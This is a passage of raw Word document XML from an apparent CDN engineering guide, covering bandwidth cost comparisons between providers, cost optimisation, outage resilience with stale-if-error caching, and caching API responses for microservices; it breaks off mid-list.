    <w:p w14:paraId="7674280C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>WAF: per-request evaluated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6131408E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>DDoS protection: usually included, premium plans for advanced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39866C84" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 CDN vs. Direct Origin — Cost Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FDD120" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example: 50 TB/month of content delivery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731"/>
        <w:gridCol w:w="3959"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="195C162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4CBC46" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Approach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DFA8D0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Monthly Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="21379E7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CB4AF5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Direct from AWS EC2 (egress)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0782F4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>50,000 GB × $0.09 = $4,500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="424B79D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C7DEB3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>AWS CloudFront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B76932" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>50,000 GB × $0.065 = $3,250</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="249D4C1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8EA677" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:lastRenderedPageBreak/>
              <w:t>Cloudflare (included bandwidth)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951040" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>$200/month (Pro plan, unmetered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="06E086D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7D6E04" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Fastly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F270DD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>50,000 GB × $0.04 = $2,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EA25EB7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN is cheaper than direct origin egress</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> for most providers because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6618868B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN has peering agreements (zero transit cost for many paths).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EE6A45" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN buys bandwidth in bulk (extreme volume discounts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366FC8DC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin only serves cache misses (5% of total bandwidth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79797A0F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Optimizing CDN Costs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C7EFF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Maximize cache hit ratio (most impactful):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0C5B1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1336"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Every cache hit = no origin bandwidth cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299CF4F6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1336"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>95% hit ratio → origin costs are 20x lower.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056E5D29" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Optimize content for delivery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F88E8F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1337"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Compress (Brotli/gzip): 60–80% smaller responses = 60–80% less bandwidth billed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B820BA5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1337"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Right-size images: don't serve 4K images to mobile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270590FC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1337"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Remove unnecessary data from API responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B97D76F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Use appropriate tier/plan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B308688" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>High-traffic sites: negotiate committed-use discounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA5D4A3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cloudflare: unmetered bandwidth on paid plans (fixed monthly cost regardless of traffic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DB6B20" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Multi-CDN: route bulk/cheap traffic to lower-cost CDN, latency-sensitive to premium CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9727B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Reduce cache misses to origin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A99B9F1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Shield layer (consolidates misses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F238D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Longer TTLs where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26839943" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Pre-warm cache before traffic spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B6C4B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="6EC7AD83">
          <v:rect id="_x0000_i4697" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="629641A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. CDN Failure Modes and Resilience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396082CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 What Happens When CDN Fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686A69F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scenario: CDN provider has a global outage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B30BC9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7F8B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>DNS for your CDN domain stops resolving (or resolves to unavailable IPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C232C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Users can't reach your content at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E2168" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Your origin is healthy but unreachable because DNS points to CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A46521" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C86E5E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1341"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Multi-CDN architecture: traffic automatically routes to surviving CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383EDBA6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1341"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>DNS failover: if CDN health check fails, DNS returns origin IP directly (bypass CDN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7D3E6D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1341"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Keep origin accessible directly (as a fallback, even if slower).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D0D49C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 What Happens When Origin Fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37792590" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN provides resilience against origin failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2C454" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1342"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cached content continues to be served from edge (stale-if-error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28529B24" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1342"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Only new/uncached content requests fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041678A4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1342"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>For static sites: CDN can serve the entire site from cache even if origin is down for hours/days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1EE6C5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Best practice configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55880070" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D859FAE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: public, s-maxage=3600, stale-if-error=86400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4BABA0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Translation: "Cache for 1 hour. If origin is unreachable, serve stale content for up to 24 hours."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74041C06" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.3 Regional CDN Outage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3F888" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> One PoP or region has issues, but others are healthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F52580A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15086149" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Health checks detect unhealthy PoP (within seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D88E57D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>DNS/anycast routing shifts traffic away from unhealthy PoP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8E08E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Users are routed to next-nearest healthy PoP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B49AE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Slight latency increase (farther PoP) but no outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B6647C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>When PoP recovers: traffic gradually returns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139E5CE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is automatic</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> in anycast-based CDNs — BGP withdrawal happens when the PoP goes down, routing immediately shifts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4531D3DF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="7D586B34">
          <v:rect id="_x0000_i4698" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2399E928" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. CDN for Specific Architectures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62926085" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 CDN + Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248DC8FA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E63DF8E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>User → CDN Edge → API Gateway → Microservices (Origin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08844865" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN caches API responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D9FD44" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1344"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>GET /api/products → cached 5 minutes (public, non-personalized).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D60AD9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1344"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>GET /api/user/profile → NOT cached (private, per-user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AE4F2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1344"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>GET /api/feed → cached 30 seconds at edge (fresh enough for most users).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE0802" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API cache invalidation strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE6045F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
